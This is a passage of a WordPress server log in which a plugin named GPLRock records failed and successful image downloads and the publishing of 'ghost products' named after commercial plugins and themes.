download failed for product woo-extra-slider-woocommerce-wordpress-slider-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woo-extra-slider---woocommerce-wordpress-slider-plugin-27752.webp for product woo-extra-slider-woocommerce-wordpress-slider-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:22 UTC] GPLRock WARNING: Image download failed for product woo-extra-slider-woocommerce-wordpress-slider-plugin. URL: https://meldwp.com/wp-content/uploads/woo-extra-slider---woocommerce-wordpress-slider-plugin-27752.webp [05-Apr-2026 03:53:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woo-extra-slider-woocommerce-wordpress-slider-plugin [05-Apr-2026 03:53:22 UTC] GPLRock: Image download failed for product gravity-forms-count-files (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:24 UTC] GPLRock: Image download failed for product gravity-forms-count-files (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravity-forms-count-files-16256.webp for product gravity-forms-count-files after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:26 UTC] GPLRock: Image download failed for product gravity-forms-count-files (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:28 UTC] GPLRock: Image download failed for product gravity-forms-count-files (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravity-forms-count-files-16256.webp for product gravity-forms-count-files after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:30 UTC] GPLRock WARNING: Image download failed for product gravity-forms-count-files. URL: https://meldwp.com/wp-content/uploads/gravity-forms-count-files-16256.webp [05-Apr-2026 03:53:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gravity-forms-count-files [05-Apr-2026 03:53:30 UTC] GPLRock: Image download failed for product sabai-directory-business-directory-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:33 UTC] GPLRock: Image download failed for product sabai-directory-business-directory-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sabai-directory---business-directory-plugin-for-wordpress-12743.webp for product sabai-directory-business-directory-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:35 UTC] GPLRock: Image download failed for product sabai-directory-business-directory-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:37 UTC] GPLRock: Image download failed for product sabai-directory-business-directory-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sabai-directory---business-directory-plugin-for-wordpress-12743.webp for product sabai-directory-business-directory-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:39 UTC] GPLRock WARNING: Image download failed for product sabai-directory-business-directory-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/sabai-directory---business-directory-plugin-for-wordpress-12743.webp [05-Apr-2026 03:53:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sabai-directory-business-directory-plugin-for-wordpress [05-Apr-2026 03:53:39 UTC] GPLRock: Image download failed for product fleetcart-modern-ecommerce-cms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:41 UTC] GPLRock: Image download failed for product fleetcart-modern-ecommerce-cms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fleetcart---modern-ecommerce-cms-29302.webp for product fleetcart-modern-ecommerce-cms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:43 UTC] GPLRock: Image download failed for product fleetcart-modern-ecommerce-cms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:45 UTC] GPLRock: Image download failed for product fleetcart-modern-ecommerce-cms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fleetcart---modern-ecommerce-cms-29302.webp for product fleetcart-modern-ecommerce-cms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:47 UTC] GPLRock WARNING: Image download failed for product fleetcart-modern-ecommerce-cms. URL: https://meldwp.com/wp-content/uploads/fleetcart---modern-ecommerce-cms-29302.webp [05-Apr-2026 03:53:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fleetcart-modern-ecommerce-cms [05-Apr-2026 03:53:48 UTC] GPLRock: Image download failed for product zoom-gallery-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:50 UTC] GPLRock: Image download failed for product zoom-gallery-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zoom-gallery-for-elementor-7914.webp for product zoom-gallery-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:52 UTC] GPLRock: Image download failed for product zoom-gallery-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:54 UTC] GPLRock: Image download failed for product zoom-gallery-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zoom-gallery-for-elementor-7914.webp for product zoom-gallery-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:53:56 UTC] GPLRock WARNING: Image download failed for product zoom-gallery-for-elementor. URL: https://meldwp.com/wp-content/uploads/zoom-gallery-for-elementor-7914.webp [05-Apr-2026 03:53:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zoom-gallery-for-elementor [05-Apr-2026 03:53:56 UTC] GPLRock: Image download failed for product social-proof-notifications-add-on-for-easy-social-share-buttons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:53:58 UTC] GPLRock: Image download failed for product social-proof-notifications-add-on-for-easy-social-share-buttons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:54:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-proof-notifications-add-on-for-easy-social-share-buttons-21411.webp for product social-proof-notifications-add-on-for-easy-social-share-buttons after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:54:01 UTC] GPLRock: Image download failed for product social-proof-notifications-add-on-for-easy-social-share-buttons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:54:03 UTC] GPLRock: Image download failed for product social-proof-notifications-add-on-for-easy-social-share-buttons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:54:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-proof-notifications-add-on-for-easy-social-share-buttons-21411.webp for product social-proof-notifications-add-on-for-easy-social-share-buttons after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:54:05 UTC] GPLRock WARNING: Image download failed for product social-proof-notifications-add-on-for-easy-social-share-buttons. URL: https://meldwp.com/wp-content/uploads/social-proof-notifications-add-on-for-easy-social-share-buttons-21411.webp [05-Apr-2026 03:54:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: social-proof-notifications-add-on-for-easy-social-share-buttons [05-Apr-2026 03:54:05 UTC] GPLRock: Image download failed for product cirilla-multipurpose-flutter-app-for-wordpress-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:54:07 UTC] GPLRock: Image download failed for product cirilla-multipurpose-flutter-app-for-wordpress-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:54:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cirilla---multipurpose-flutter-app-for-wordpress--woocommerce-12779.webp for product cirilla-multipurpose-flutter-app-for-wordpress-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:54:09 UTC] GPLRock: Image download failed for product cirilla-multipurpose-flutter-app-for-wordpress-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:54:11 UTC] GPLRock: Image download failed for product cirilla-multipurpose-flutter-app-for-wordpress-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:54:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cirilla---multipurpose-flutter-app-for-wordpress--woocommerce-12779.webp for product cirilla-multipurpose-flutter-app-for-wordpress-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:54:13 UTC] GPLRock WARNING: Image download failed for product cirilla-multipurpose-flutter-app-for-wordpress-woocommerce. URL: https://meldwp.com/wp-content/uploads/cirilla---multipurpose-flutter-app-for-wordpress--woocommerce-12779.webp [05-Apr-2026 03:54:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cirilla-multipurpose-flutter-app-for-wordpress-woocommerce [05-Apr-2026 03:54:35 UTC] GPLRock: Image downloaded successfully for product trevia-travel-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-54985535.webp [05-Apr-2026 03:54:35 UTC] GPLRock: Using pre-downloaded image for product trevia-travel-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-54985535.webp [05-Apr-2026 03:54:35 UTC] GPLRock: Ghost product published with image - Product ID: trevia-travel-agency-elementor-template-kit [05-Apr-2026 03:54:36 UTC] GPLRock: Image downloaded successfully for product trena-sport-fitness-trainer-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0dad90d6.webp [05-Apr-2026 03:54:36 UTC] GPLRock: Using pre-downloaded image for product trena-sport-fitness-trainer-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0dad90d6.webp [05-Apr-2026 03:54:36 UTC] GPLRock: Ghost product published with image - Product ID: trena-sport-fitness-trainer-services-elementor-template-kit [05-Apr-2026 03:54:38 UTC] GPLRock: Image downloaded successfully for product treely-landscape-gardening-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b14257e5.webp [05-Apr-2026 03:54:38 UTC] GPLRock: Using pre-downloaded image for product treely-landscape-gardening-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b14257e5.webp [05-Apr-2026 03:54:38 UTC] GPLRock: Ghost product published with image - Product ID: treely-landscape-gardening-elementor-template-kit [05-Apr-2026 03:54:39 UTC] GPLRock: Image downloaded successfully for product trawell-travel-blog-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8dae2b70.webp [05-Apr-2026 03:54:39 UTC] GPLRock: Using pre-downloaded image for product trawell-travel-blog-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8dae2b70.webp [05-Apr-2026 03:54:39 UTC] GPLRock: Ghost product published with image - Product ID: trawell-travel-blog-elementor-template-kit [05-Apr-2026 03:54:41 UTC] GPLRock: Image downloaded successfully for product travisa-immigration-visa-consulting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-172f1eaf.jpg [05-Apr-2026 03:54:41 UTC] GPLRock: Using pre-downloaded image for product travisa-immigration-visa-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-172f1eaf.jpg [05-Apr-2026 03:54:41 UTC] GPLRock: Ghost product published with image - Product ID: travisa-immigration-visa-consulting-elementor-template-kit [05-Apr-2026 03:54:42 UTC] GPLRock: Image downloaded successfully for product traveltour-travel-booking-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fc8538e1.webp [05-Apr-2026 03:54:42 UTC] GPLRock: Using pre-downloaded image for product traveltour-travel-booking-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fc8538e1.webp [05-Apr-2026 03:54:42 UTC] GPLRock: Ghost product published with image - Product ID: traveltour-travel-booking-template-kit [05-Apr-2026 03:54:44 UTC] GPLRock: Image downloaded successfully for product travelio-travel-tourism-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b137a8d2.webp [05-Apr-2026 03:54:44 UTC] GPLRock: Using pre-downloaded image for product travelio-travel-tourism-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b137a8d2.webp [05-Apr-2026 03:54:44 UTC] GPLRock: Ghost product published with image - Product ID: travelio-travel-tourism-elementor-template-kit [05-Apr-2026 03:54:45 UTC] GPLRock: Image downloaded successfully for product translantic-translation-service-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5838678e.webp [05-Apr-2026 03:54:45 UTC] GPLRock: Using pre-downloaded image for product translantic-translation-service-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5838678e.webp [05-Apr-2026 03:54:45 UTC] GPLRock: Ghost product published with image - Product ID: translantic-translation-service-agency-elementor-template-kit [05-Apr-2026 03:54:47 UTC] GPLRock: Image downloaded successfully for product trail-bike-shop-bicycle-repair-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99801cf1.jpg [05-Apr-2026 03:54:47 UTC] GPLRock: Using pre-downloaded image for product trail-bike-shop-bicycle-repair-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99801cf1.jpg [05-Apr-2026 03:54:47 UTC] GPLRock: Ghost product published with image - Product ID: trail-bike-shop-bicycle-repair-elementor-template-kit [05-Apr-2026 03:54:49 UTC] GPLRock: Image downloaded successfully for product towigo-emergency-towing-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb51b462.jpg [05-Apr-2026 03:54:49 UTC] GPLRock: Using pre-downloaded image for product towigo-emergency-towing-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb51b462.jpg [05-Apr-2026 03:54:49 UTC] GPLRock: Ghost product published with image - Product ID: towigo-emergency-towing-services-elementor-template-kit [05-Apr-2026 03:55:44 UTC] GPLRock: Image downloaded successfully for product westwood-golf-club-course-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1b843f06.jpg [05-Apr-2026 03:55:44 UTC] GPLRock: Using pre-downloaded image for product westwood-golf-club-course-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1b843f06.jpg [05-Apr-2026 03:55:44 UTC] GPLRock: Ghost product published with image - Product ID: westwood-golf-club-course-elementor-template-kit [05-Apr-2026 03:55:45 UTC] GPLRock: Image downloaded successfully for product weon-call-center-telemarketing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe0a06b6.webp [05-Apr-2026 03:55:45 UTC] GPLRock: Using pre-downloaded image for product weon-call-center-telemarketing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe0a06b6.webp [05-Apr-2026 03:55:45 UTC] GPLRock: Ghost product published with image - Product ID: weon-call-center-telemarketing-elementor-template-kit [05-Apr-2026 03:55:50 UTC] GPLRock: Image downloaded successfully for product wembley-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-82821d82.webp [05-Apr-2026 03:55:50 UTC] GPLRock: Using pre-downloaded image for product wembley-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-82821d82.webp [05-Apr-2026 03:55:50 UTC] GPLRock: Ghost product published with image - Product ID: wembley-blog-magazine-elementor-template-kit [05-Apr-2026 03:55:51 UTC] GPLRock: Image downloaded successfully for product wellness-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5081311b.webp [05-Apr-2026 03:55:51 UTC] GPLRock: Using pre-downloaded image for product wellness-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5081311b.webp [05-Apr-2026 03:55:51 UTC] GPLRock: Ghost product published with image - Product ID: wellness-elementor-template-kit [05-Apr-2026 03:55:53 UTC] GPLRock: Image downloaded successfully for product wekala-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a1fe8afa.webp [05-Apr-2026 03:55:53 UTC] GPLRock: Using pre-downloaded image for product wekala-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a1fe8afa.webp [05-Apr-2026 03:55:53 UTC] GPLRock: Ghost product published with image - Product ID: wekala-agency-elementor-template-kit [05-Apr-2026 03:55:54 UTC] GPLRock: Image downloaded successfully for product weedream-wedding-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-03f1b406.webp [05-Apr-2026 03:55:54 UTC] GPLRock: Using pre-downloaded image for product weedream-wedding-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-03f1b406.webp [05-Apr-2026 03:55:54 UTC] GPLRock: Ghost product published with image - Product ID: weedream-wedding-elementor-template-kit [05-Apr-2026 03:55:56 UTC] GPLRock: Image downloaded successfully for product weddon-wedding-event-invitation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-15bf5777.webp [05-Apr-2026 03:55:56 UTC] GPLRock: Using pre-downloaded image for product weddon-wedding-event-invitation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-15bf5777.webp [05-Apr-2026 03:55:56 UTC] GPLRock: Ghost product published with image - Product ID: weddon-wedding-event-invitation-elementor-template-kit [05-Apr-2026 03:55:57 UTC] GPLRock: Image downloaded successfully for product wecreative-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3f5b242c.webp [05-Apr-2026 03:55:57 UTC] GPLRock: Using pre-downloaded image for product wecreative-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3f5b242c.webp [05-Apr-2026 03:55:57 UTC] GPLRock: Ghost product published with image - Product ID: wecreative-digital-agency-elementor-template-kit [05-Apr-2026 03:55:59 UTC] GPLRock: Image downloaded successfully for product webina-business-agency-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e0e8bd48.webp [05-Apr-2026 03:55:59 UTC] GPLRock: Using pre-downloaded image for product webina-business-agency-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e0e8bd48.webp [05-Apr-2026 03:55:59 UTC] GPLRock: Ghost product published with image - Product ID: webina-business-agency-startup-elementor-template-kit [05-Apr-2026 03:56:00 UTC] GPLRock: Image downloaded successfully for product webhoster-web-hosting-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c627bb44.webp [05-Apr-2026 03:56:00 UTC] GPLRock: Using pre-downloaded image for product webhoster-web-hosting-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c627bb44.webp [05-Apr-2026 03:56:00 UTC] GPLRock: Ghost product published with image - Product ID: webhoster-web-hosting-service-elementor-template-kit [05-Apr-2026 03:56:47 UTC] GPLRock: Image downloaded successfully for product woocommerce-deposits (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-15bda601.jpg [05-Apr-2026 03:56:47 UTC] GPLRock: Using pre-downloaded image for product woocommerce-deposits: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-15bda601.jpg [05-Apr-2026 03:56:47 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-deposits [05-Apr-2026 03:56:48 UTC] GPLRock: Image downloaded successfully for product woocommerce-cart-add-ons (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-abc05cf5.jpg [05-Apr-2026 03:56:49 UTC] GPLRock: Using pre-downloaded image for product woocommerce-cart-add-ons: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-abc05cf5.jpg [05-Apr-2026 03:56:49 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-cart-add-ons [05-Apr-2026 03:56:50 UTC] GPLRock: Image downloaded successfully for product cerato-elementor-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1c85a850.jpg [05-Apr-2026 03:56:50 UTC] GPLRock: Using pre-downloaded image for product cerato-elementor-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1c85a850.jpg [05-Apr-2026 03:56:50 UTC] GPLRock: Ghost product published with image - Product ID: cerato-elementor-woocommerce-theme [05-Apr-2026 03:56:51 UTC] GPLRock: Image downloaded successfully for product blade-responsive-multi-functional-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b0047b03.jpg [05-Apr-2026 03:56:51 UTC] GPLRock: Using pre-downloaded image for product blade-responsive-multi-functional-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b0047b03.jpg [05-Apr-2026 03:56:51 UTC] GPLRock: Ghost product published with image - Product ID: blade-responsive-multi-functional-theme [05-Apr-2026 03:56:53 UTC] GPLRock: Image downloaded successfully for product scroll-magic-wordpress-scrolling-animation-builder-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46361949.jpg [05-Apr-2026 03:56:53 UTC] GPLRock: Using pre-downloaded image for product scroll-magic-wordpress-scrolling-animation-builder-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46361949.jpg [05-Apr-2026 03:56:53 UTC] GPLRock: Ghost product published with image - Product ID: scroll-magic-wordpress-scrolling-animation-builder-plugin [05-Apr-2026 03:56:54 UTC] GPLRock: Image downloaded successfully for product webba-booking-wordpress-appointment-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82a465d8.jpg [05-Apr-2026 03:56:54 UTC] GPLRock: Using pre-downloaded image for product webba-booking-wordpress-appointment-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82a465d8.jpg [05-Apr-2026 03:56:54 UTC] GPLRock: Ghost product published with image - Product ID: webba-booking-wordpress-appointment-plugin [05-Apr-2026 03:56:55 UTC] GPLRock: Image downloaded successfully for product woocommerce-payment-gateway-based-fees (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a35ce7f.jpg [05-Apr-2026 03:56:55 UTC] GPLRock: Using pre-downloaded image for product woocommerce-payment-gateway-based-fees: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a35ce7f.jpg [05-Apr-2026 03:56:55 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-payment-gateway-based-fees [05-Apr-2026 03:56:56 UTC] GPLRock: Image downloaded successfully for product woocommerce-custom-fields (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-06d07295.jpg [05-Apr-2026 03:56:56 UTC] GPLRock: Using pre-downloaded image for product woocommerce-custom-fields: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-06d07295.jpg [05-Apr-2026 03:56:56 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-custom-fields [05-Apr-2026 03:56:58 UTC] GPLRock: Image downloaded successfully for product woocommerce-mix-and-match-products (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad46f095.jpg [05-Apr-2026 03:56:58 UTC] GPLRock: Using pre-downloaded image for product woocommerce-mix-and-match-products: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad46f095.jpg [05-Apr-2026 03:56:58 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-mix-and-match-products [05-Apr-2026 03:56:59 UTC] GPLRock: Image downloaded successfully for product warranties-and-returns-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-32e7e975.jpg [05-Apr-2026 03:56:59 UTC] GPLRock: Using pre-downloaded image for product warranties-and-returns-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-32e7e975.jpg [05-Apr-2026 03:56:59 UTC] GPLRock: Ghost product published with image - Product ID: warranties-and-returns-for-woocommerce [05-Apr-2026 03:57:47 UTC] GPLRock: Image download failed for product consulenza-counseling-therapy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:57:49 UTC] GPLRock: Image download failed for product consulenza-counseling-therapy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:57:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/consulenza---counseling-therapy-wordpress-theme-12087.webp for product consulenza-counseling-therapy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:57:52 UTC] GPLRock: Image download failed for product consulenza-counseling-therapy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:57:54 UTC] GPLRock: Image download failed for product consulenza-counseling-therapy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:57:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/consulenza---counseling-therapy-wordpress-theme-12087.webp for product consulenza-counseling-therapy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:57:56 UTC] GPLRock WARNING: Image download failed for product consulenza-counseling-therapy-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/consulenza---counseling-therapy-wordpress-theme-12087.webp [05-Apr-2026 03:57:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: consulenza-counseling-therapy-wordpress-theme [05-Apr-2026 03:57:56 UTC] GPLRock: Image download failed for product partiso-political-wordpress-theme-for-party-candidate (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:57:58 UTC] GPLRock: Image download failed for product partiso-political-wordpress-theme-for-party-candidate (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/partiso--political-wordpress-theme-for-party--candidate-5380.webp for product partiso-political-wordpress-theme-for-party-candidate after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:00 UTC] GPLRock: Image download failed for product partiso-political-wordpress-theme-for-party-candidate (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:02 UTC] GPLRock: Image download failed for product partiso-political-wordpress-theme-for-party-candidate (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/partiso--political-wordpress-theme-for-party--candidate-5380.webp for product partiso-political-wordpress-theme-for-party-candidate after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:58:04 UTC] GPLRock WARNING: Image download failed for product partiso-political-wordpress-theme-for-party-candidate. URL: https://meldwp.com/wp-content/uploads/partiso--political-wordpress-theme-for-party--candidate-5380.webp [05-Apr-2026 03:58:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: partiso-political-wordpress-theme-for-party-candidate [05-Apr-2026 03:58:05 UTC] GPLRock: Image download failed for product sara-woocommerce-wordpress-market-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:58:07 UTC] GPLRock: Image download failed for product sara-woocommerce-wordpress-market-theme (attempt 2/3). HTTP Code: 526, 